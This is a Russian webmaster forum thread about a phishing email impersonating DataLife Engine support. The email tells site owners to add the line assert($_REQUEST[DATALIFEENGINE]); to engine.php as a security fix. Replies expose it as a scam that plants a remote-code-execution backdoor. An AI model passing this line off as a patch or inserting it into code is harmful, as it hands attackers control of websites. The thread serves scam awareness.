- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы
Для интернет-магазина инженерных систем
Мария Лосева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Всем привет, пришло вот такое письмо от dle-news.ru:
Уважаемые владельцы сайта,
благодарим вас за выбор системы управления сайтом «DataLife Engine».
К сожалению, ваш сайт входит в число уязвимых сайтов и может быть взломан в любой момент. Просим вас серьёзно отнестись к данной проблеме и устранить уязвимость, следуя инструкции ниже:
Для исправления откройте файл вашего сайта: /engine/engine.php и в самое начало файла после строчки:
<?php
добавьте:
assert($_REQUEST[DATALIFEENGINE]);
Кому еще такое уведомление пришло?
И кто-нибудь подскажет, как эта магическая строка решает проблему?
Полагаю, что это просто мошенники. Добавив этот код, вы просто создадите уязвимость на сайте, с помощью которой в дальнейшем может быть осуществлен взлом или другие неправомерные действия.
Всем привет, пришло вот такое письмо от dle-news.ru:
Уважаемые владельцы сайта,
благодарим вас за выбор системы управления сайтом «DataLife Engine».
служебные заголовки письма глянь )))
интересно, если напишут положи ключи от машины под то колесо, и подпишутся "БМВ" - тоже поверите?
з.ы. опередили.
Очевидно же, письмо - фейк, простая спам рассылка
служебные заголовки письма глянь )))
Ну, я то заподозрил неладное, но все таки, решил спросить на всякий случай))
Письмо отправлено было с адреса tech@dle-news.ru, сейчас глянул, у них на сайте другое мыло контактное...
rexsar_87, совсем недавно аналогичная тема была на серче, сейчас с ходу не найду. Все новые уязвимости техподдержка ДЛЕ всегда выкладывает у себя на сайте http://dle-news.ru/bags/. В крайнем случае можно написать им в техподдержку и спросить (если конечно есть лицензия :)). Не ведитесь на разные фейки...
Вот была тема http://talk.pr-cy.ru/topic/10104-akkuratno-razvod-vladeltcev-sajtov-na-dle/
Любые патчи всегда официально публикуются в соответствующем разделе http://dle-news.ru/bags/
А это письмо не от нас и отправлялось не с нашего домена, это мошенники втюхивают вам вирус.
Вы же все администраторы сайтов, как вы можете "вестись" на подобные письма. Вам как администраторам сайтов должно быть известно, что в качестве отправителей писем можно поставить любой адрес и поэтому нужно всегда смотреть именно свойства важных писем и откуда реально пришло письмо и с какого сервера.
Ладно когда обычные пользователи интернета проявляют невнимательность, но когда подобную безалаберность проявляют администраторы сайтов, это уже переходит грани разумного. Что уж тут удивляться новостям типа http://habrahabr.ru/post/236077/ и http://habrahabr.ru/post/235949/ где люди свято верят что они очень ответственны, а это все разработчики виноваты.
.......................
Ну, я то заподозрил неладное, но все таки, решил спросить на всякий случай))
Письмо отправлено было с адреса tech@dle-news.ru, сейчас глянул, у них на сайте другое мыло контактное...
создай файл не важно название .php
и потом так
Посмотри итог). То письмо, которое получил ты)
Запусти на выполнение.
Конечно, фейк. Не иначе. Заголовки письма глядите всегда.
Социальная инженерия в действии.